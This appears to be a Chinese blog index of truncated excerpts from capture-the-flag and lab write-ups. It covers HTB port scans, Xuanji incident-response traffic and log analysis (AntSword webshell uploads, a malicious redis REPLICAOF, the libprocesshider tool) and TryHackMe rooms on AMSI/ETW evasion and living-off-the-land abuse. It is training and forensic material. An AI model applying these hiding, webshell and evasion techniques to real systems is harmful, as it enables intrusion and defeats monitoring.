打靶记录(一二一)之HTBHeadLess
端口扫描┌──(mikannse㉿kali)-[~/HTB/headless]└─$ sudo nmap --min-rate=10000 -p- 10.10.11.8Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-02 21:08 CSTWarning: 10.10.11.8 giving up on port because retransmission cap hit (10).Nmap scan report for 10.10.11.8Host is up (0.088s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh5000/tcp open upnpNmap done: 1 IP address (1 host up) scanned in 10.35 seconds
┌──(mikannse㉿kali)-[~/HTB/headless]└─$ sudo nmap -sT -s ...
打靶记录(一二零)之HTBCap
端口扫描┌──(mikannse㉿kali)-[~]└─$ sudo nmap --min-rate=10000 -p- 10.10.10.245Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-02 14:42 CSTNmap scan report for 10.10.10.245Host is up (0.086s latency).Not shown: 65532 closed tcp ports (reset)PORT STATE SERVICE21/tcp open ftp22/tcp open ssh80/tcp open httpNmap done: 1 IP address (1 host up) scanned in 18.49 seconds
┌──(mikannse㉿kali)-[~]└─$ sudo nmap -sT -sV -sC -O -p21,22,80 10.10.10.245Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09- ...
玄机实战-应急响应
行业攻防应急响应1.根据流量包分析首个进行扫描攻击的IP是http.request
从时间顺序看,有一个IP在扫描目录
flag{192.168.0.223}
2.根据流量包分析第二个扫描攻击的IP和漏扫工具,以flag{x.x.x.x&工具名}ip.dst == 192.168.0.211&&ip.src==192.168.0.200&&http
在扫描目录的过程有一个目录含有bxss.me域名,为Acunetix的特征
flag{192.168.0.200&Acunetix}
3.提交频繁爆破密钥的IP及爆破次数,以flag{ip&次数}提交http.request && ip.dst == 192.168.0.211
发现有一种流量是在爆破login,并且根据remenberMe字段能够判断是在爆破shiro框架的密钥
GET /login HTTP/1.1Cookie: rememberMe=cL6HQNLGJbwcJNCqcjg8NdJQnmUd7JdI76Az9uqSiLf1ToFQAZHTcf ...
玄机应急响应第六章
蚁剑流量分析1.木马的连接密码是多少http.request.method==POST
flag{1}
2.黑客执行的第一个命令是什么根据第一个流量包的返回是(www-data) gid=33(www-data) groups=33(www-data),得知使用了id命令
flag{id}
3.黑客读取了哪个文件的内容,提交文件绝对路径根据第三个流量包,得知读取了/etc/passwd
flag{/etc/passwd}
4.黑客上传了什么文件到服务器,提交文件名根据第四个流量包的
Form item: “t41ffbc5fb0c04” = “0ZL3Zhci93d3cvaHRtbC9mbGFnLnR4dA==”
取值的第二位开始偏移然后base64解码,因为前两位是随机字符用于混淆的
flag{flag.txt}
5.黑客上传的文件内容是什么Form item: “ld807e7193493d” = “666C61677B77726974655F666C61677D0A”
蚁剑上传文件内容会被16进制编码
flag{write_flag}
6.黑客下载了哪个文件,提交文件绝对路径第 ...
THMHolo
Generation One欢迎来到 Holo!
Holo 是一个 Active Directory 和 Web 应用程序攻击实验室,教授核心 Web 攻击媒介和高级\模糊的 Active Directory 攻击以及一般的红队方法和概念。
在本实验室中,您将学习和探索以下主题:
.NET 基础知识
Web 应用程序开发
AVevasion
白名单和容器逃逸
枢转
使用 C2(命令和控制)框架进行操作
后开发
态势感知
Active Directory 攻击
您将学习和利用以下攻击和错误配置:
错误配置的子域
本地文件包含
远程代码执行
Docker 容器
SUID 二进制文件
密码重置
客户端过滤器
AppLocker
易受攻击的 DLL
Net-NTLMv2 /SMB
此网络模拟了对企业网络“Hololive”的外部渗透测试,其中包含一个预期的杀伤链。所有概念和漏洞都将以红队方法论和思维方式进行讲授,其他方法和技术将在整个网络中讲授。
这个网络将带您从零开始成为红队,但您需要对基本的 Windows 和 Linux 架构以及 Windows 和 Linux 的命令行有大致 ...
THMWreath
IntroductionWreath 旨在作为初学者的学习资源,主要侧重于:
Pivoting
使用 Empire C2(命令和控制)框架
简单的反病毒规避技术
还将涵盖以下主题,但更简短:
代码分析(Python 和 PHP)
定位和修改公共漏洞
简单的 Web 应用程序枚举和利用
Git 存储库分析
简单的 Windows 后利用技术
CLI 防火墙管理(CentOS 和 Windows)
交叉编译技术
编码包装程序
简单的渗透技术
格式化渗透测试报告
这些将在利用 Wreath 网络的过程中教授。
这几乎被设计为一个沙盒环境,以跟随教学内容;重点将放在上述教学要点上,而不是初始访问和权限提升漏洞上(与平台上其他专注于挑战的盒子相反)
BriefThomas 发送了以下有关网络的信息:
*我家网络上有两台机器,用于托管我业余时间进行的项目和工作内容——其中一台机器有一个端口转发的网络服务器,所以如果你能找到漏洞,它就是你的入口!它为一个网站提供服务,该网站从我自己的 PC 推送到我的 git 服务器进行版本控制,然后克隆到面向公众的服务器。看看你能不能进入这些!我自己的 ...
玄机应急响应第五章
黑链找到黑链添加在哪个文件 flag 格式 flag{xxx.xxx}root@ip-10-0-10-3:/var/www/html# grep -rnw '/var/www/html/' -e '黑链'/var/www/html/usr/themes/default/header.php:24:<h3 style="text-align:center">模拟黑链</h3>
但是平常排除黑链
查看异常链接:使用 grep 或其他工具查找所有外部链接,并检查是否有异常链接指向可疑网站。
grep -rni 'href=' /var/www/html/
查看 JavaScript 文件:检查 JavaScript 文件中的可疑代码或动态加载的链接。
grep -rni 'http' /var/www/html/
webshell的绝对路径 flag{xxxx/xxx/xxx/xxx/}放入D盾扫描,得到是
flag{/var/www/html/usr/themes/default/404.php}
黑客注入黑链文件的 md5 md5sum file flag{ ...
玄机应急响应第三章
linux权限维持-隐藏1.黑客隐藏的隐藏的文件 完整路径md5在/tmp有一个.temp,发现是libprocesshider,是用于隐藏文件的工具
https://github.com/gianlucaborello/libprocesshider
root@xuanji:/tmp/.temp/libprocesshider# cat processhider.c #define _GNU_SOURCE#include <stdio.h>#include <dlfcn.h>#include <dirent.h>#include <string.h>#include <unistd.h>/* * Every process with this name will be excluded */static const char* process_to_filter = "1.py";
隐藏的文件是1.py
/tmp/.temp/libprocesshider/1.py
flag{109ccb5768c70638e24fb46 ...
玄机应急响应第二章
redis应急响应通过本地 PC SSH到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交;查看/var/log/redis.log
找到
419:S 31 Jul 2023 05:34:33.173 * REPLICAOF 192.168.100.20:8888 enabled (user request from ‘id=6 addr=192.168.200.2:64339 fd=7 name= age=0 idle=0 flags=N db=0 sub=0 psub=0 multi=-1 qbuf=48 qbuf-free=32720 obl=0 oll=0 omem=0 events=r cmd=slaveof’)
flag{192.168.100.20}
通过本地 PC SSH到服务器并且分析黑客第一次上传的恶意文件,将黑客上传的恶意文件里面的 FLAG 提交;发现存在一行
419:S 31 Jul 2023 05:34:37.205 * Module ‘system’ loaded from ./exp.so
并在根目录找到这个exp.so
r ...
THMLivingOfftheLand
Introduction什么是“靠土地为生”?
Living Off the Land 是红队社区中的一个流行术语,该名称取自现实生活,即靠吃土地上的食物为生。同样,对手和恶意软件创建者也会利用目标计算机的内置功能。 - 在工具和公用事业中。Living Off the Land 一词于 2013 年在 DerbyCon3 上引入,并在红队社区从此成为一种经常使用和流行的技术。
这些内置工具在目标系统或网络功能内执行各种常规活动;但是,它们越来越多地被使用和滥用,例如,使用CertUtil将恶意文件下载到目标计算机的工具。
主要想法是使用微软签名的程序、脚本和库来融入并逃避防御控制,红队人员不希望在目标上执行交战活动时被检测到,因此使用这些工具可以更安全地保持其隐身性。
以下是靠土地生活的一些类别:
侦察
文件操作
任意代码执行
横向运动-安全产品绕过
学习目标
了解红队活动的“Living Off the Land”一词。
了解 LOLBAS 项目以及如何使用它。
了解并应用红队活动中使用的技术。
房间先决条件
一般黑客技术的基本知识。
完成Jr.渗透测试仪学习路径。
T ...
THM免杀学习EvadingLoggingandMonitoring
Introduction攻击者路径中最大的障碍之一是日志记录和监控,与防病毒和 EDR(Endpoint Dection and Response)解决方案不同,日志记录创建了一个解决方案。可以分析恶意活动的活动的物理记录。
设备的监控方式取决于公司的环境和偏好。通常,监控解决方案将从主机设备开始,收集应用程序或事件日志。它们可以保留在设备上或发送到事件收集器/转发器,一旦它们离开设备,防御团队就会决定如何聚合它们;这通常是使用索引器和 SIEM (Security Information and Event Manager) 来完成的。
一旦从设备上获取日志,攻击者可能没有太多控制权,但可以控制设备上的内容及其获取方式。攻击者的主要目标是由 ETW(Event Tracing for Windows) 管理和控制的事件日志。
该房间将解决事件跟踪及其弱点,以允许攻击者逃避或禁用基于 ETW 的解决方案。
Learning Objectives
了解事件追踪的技术和实现。
了解如何创建规避 ETW 的技术。
学习如何将理论规避概念应用到代码中。
在开始本房间之前,请熟悉基本的 Wi ...
THM免杀学习RuntimeDetectionEvasion
Introduction随着 PowerShell <3 the Blue Team 的发布,Microsoft 发布了 AMSI(反恶意软件扫描接口),这是一种运行时监控解决方案,旨在阻止和监控持续的威胁。
学习目标
了解运行时检测的目的以及如何检测它们。
学习并应用绕过 AMSI 的技术。
了解常见的缓解措施和潜在的技术替代方案。
运行时检测措施在执行恶意代码时可能会导致许多麻烦和障碍,幸运的是,对于我们攻击者来说,我们可以滥用和利用多种技术和方法来绕过常见的运行时检测解决方案。
该房间将使用多位作者和研究人员的研究成果;所有功劳归各自所有者所有。
在开始本课程之前,建议您熟悉整个操作系统架构,但不要求具备 C# 和 PowerShell 的基本编程知识。
Runtime Detections执行代码或应用程序时,无论解释器如何,它几乎总是会流经运行时,这在使用 Windows API 调用和与 .NET 交互时最常见。 CLR (Common Language Runtime) 和 DLR (Dynamic Language Runtime) 是 .NET 的运行时, ...